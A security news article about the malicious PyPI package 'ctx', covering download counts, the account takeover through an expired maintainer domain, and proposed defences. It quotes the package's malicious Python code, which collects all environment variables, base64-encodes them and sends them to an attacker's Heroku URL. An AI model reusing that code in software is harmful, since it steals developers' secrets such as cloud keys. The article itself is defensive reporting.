How a Malicious PyPI Package Stole Secrets and What It Means for PyPI Security

PyPI has warned developers about a malicious package named “ctx” that exfiltrates environment variables.

The organization is investigating installations from the past ten days to determine whether sensitive identifiers stored in environment variables (e.g., cloud access keys) have been stolen.

PyPI administrators estimate that about 27,000 malicious copies of ctx were downloaded from the repository registry after the first malicious version appeared around 2022-05-14 19:18.

ctx (1.2) is also a dependency of another package, Context Engine.

Administrators note that the malicious ctx version does not appear as a dependency on Library.io.

In addition to the Python ctx package, the author Yee Ching Tok of the Internet Storm Center observed a now‑removed GitHub project (github.com/hautelook/phpass) whose PHP code contained the same malicious payload.

The malicious code iterates over environment variables on the victim’s machine, encodes them in base64, and appends them as query parameters to a Heroku application URL, indicating an exploratory rather than purely destructive attack.

class Ctx(dict):
    def __init__(self):
        self.sendRequest()
    def sendRequest(self):
        string = ""
        for _, value in os.environ.items():
            string += value+" "
        message_bytes = string.encode('ascii')
        base64_bytes = base64.b64encode(message_bytes)
        base64_message = base64_bytes.decode('ascii')
        response = requests.get("hxxps://anti-theft-web.herokuapp.com/hacked/"+base64_message)

The package’s author field was altered to “Yunus AYDIN” while the email address remained unchanged.

After re‑registering the previously expired domain figlief.com and recreating the maintainer’s email address, the developer was able to initiate a password reset for the “ctx” project on PyPI.

By resetting the password, the attacker regained access to the PyPI maintainer account and could publish altered versions.

PyPI administrators acknowledge that domain takeover is a known attack vector. Defensive measures such as disabling the “verified” email status (required for password changes) are in place, but the verification process does not reliably detect compromised domains.

Python community members suggest that PyPI could continuously scan for and freeze expired or soon‑to‑expire domain accounts, though this would increase the moderation workload.